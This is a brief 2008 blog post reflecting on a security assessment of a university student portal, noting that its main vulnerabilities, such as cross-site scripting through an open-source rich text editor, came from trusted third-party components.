02 June, 2008

usu's ezportal security assessment

about 3 weeks ago i finished a security assessment for a new application the university of utah is planning on rolling out so that students, teachers, and staff to can manage all of their usu data.

our analysis included looking at the overall application architecture, looking at the coding, and a test to try to exploit vulnerabilities.

i thought it was interesting that every major hole in the application, came from the developers trusting the libraries and subcomponents they were using. for example, the developers were using an open source rich text editor (so that users could upload nice looking content without having to know html), that could easily be exploited to upload malicious code, or render content from any other site (yes, as in a xss attack).

so, the mantra of "find the dependencies -- and eliminate them", turns out to be true for security problems too.